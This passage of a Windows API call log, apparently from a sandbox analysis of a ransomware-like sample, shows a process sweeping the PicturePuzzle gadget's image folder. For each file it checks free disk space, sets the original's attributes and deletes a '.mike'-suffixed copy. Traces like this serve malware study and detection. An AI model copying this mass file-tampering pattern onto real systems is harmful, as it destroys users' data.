lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png", dwFileAttributes=0x80) returned 0 [0104.600] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png.mike")) returned 1 [0104.602] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png", dwFileAttributes=0x80) returned 0 [0104.610] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png.mike")) returned 1 [0104.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png", dwFileAttributes=0x80) returned 0 [0104.615] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png.mike")) returned 1 [0104.617] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png", dwFileAttributes=0x80) returned 0 [0104.622] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png.mike")) returned 1 [0104.623] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png", dwFileAttributes=0x80) returned 0 [0104.628] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png.mike")) returned 1 [0104.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png", dwFileAttributes=0x80) returned 0 [0104.634] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png.mike")) returned 1 [0104.636] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png", dwFileAttributes=0x80) returned 0 [0104.640] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png.mike")) returned 1 [0104.641] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png", dwFileAttributes=0x80) returned 0 [0104.645] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png.mike")) returned 1 [0104.647] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png", dwFileAttributes=0x80) returned 0 [0104.651] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png.mike")) returned 1 [0104.652] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png", dwFileAttributes=0x80) returned 0 [0104.656] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png.mike")) returned 1 [0104.658] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png", dwFileAttributes=0x80) returned 0 [0104.663] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png.mike")) returned 1 [0104.665] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png", dwFileAttributes=0x80) returned 0 [0104.669] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png.mike")) returned 1 [0104.671] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png", dwFileAttributes=0x80) returned 0 [0104.675] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png.mike")) returned 1 [0104.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png", dwFileAttributes=0x80) returned 0 [0104.680] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png.mike")) returned 1 [0104.682] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png", dwFileAttributes=0x80) returned 0 [0104.686] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png.mike")) returned 1 [0104.687] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png", dwFileAttributes=0x80) returned 0 [0104.691] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png.mike")) returned 1 [0104.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png", dwFileAttributes=0x80) returned 0 [0104.697] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png.mike")) returned 1 [0104.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png", dwFileAttributes=0x80) returned 0 [0104.703] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png.mike")) returned 1 [0104.704] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png", dwFileAttributes=0x80) returned 0 [0104.708] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png.mike")) returned 1 [0104.722] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png", dwFileAttributes=0x80) returned 0 [0104.727] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png.mike")) returned 1 [0104.729] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png", dwFileAttributes=0x80) returned 0 [0104.734] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png.mike")) returned 1 [0104.735] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png", dwFileAttributes=0x80) returned 0 [0104.740] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png.mike")) returned 1 [0104.741] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png", dwFileAttributes=0x80) returned 0 [0104.748] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png.mike")) returned 1 [0104.749] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png", dwFileAttributes=0x80) returned 0 [0104.754] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png.mike")) returned 1 [0104.755] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png", dwFileAttributes=0x80) returned 0 [0104.764] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png.mike")) returned 1 [0104.765] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png", dwFileAttributes=0x80) returned 0 [0104.769] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png.mike")) returned 1 [0104.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png", dwFileAttributes=0x80) returned 0 [0104.775] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png.mike")) returned 1 [0104.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png", dwFileAttributes=0x80) returned 0 [0104.781] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png.mike")) returned 1 [0104.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png", dwFileAttributes=0x80) returned 0 [0104.788] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png.mike")) returned 1 [0104.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png", dwFileAttributes=0x80) returned 0 [0104.794] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png.mike")) returned 1 [0104.796] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png", dwFileAttributes=0x80) returned 0 [0104.801] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png.mike")) returned 1 [0104.802] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png", dwFileAttributes=0x80) returned 0 [0104.807] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png.mike")) returned 1 [0104.811] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png", dwFileAttributes=0x80) returned 0 [0104.816] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.mike")) returned 1 [0104.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", dwFileAttributes=0x80) returned 0 [0104.824] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike")) returned 1 [0104.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", dwFileAttributes=0x80) returned 0 [0104.831] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike")) returned 1 [0104.833] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", dwFileAttributes=0x80) returned 0 [0104.837] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike")) returned 1 [0104.839] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, 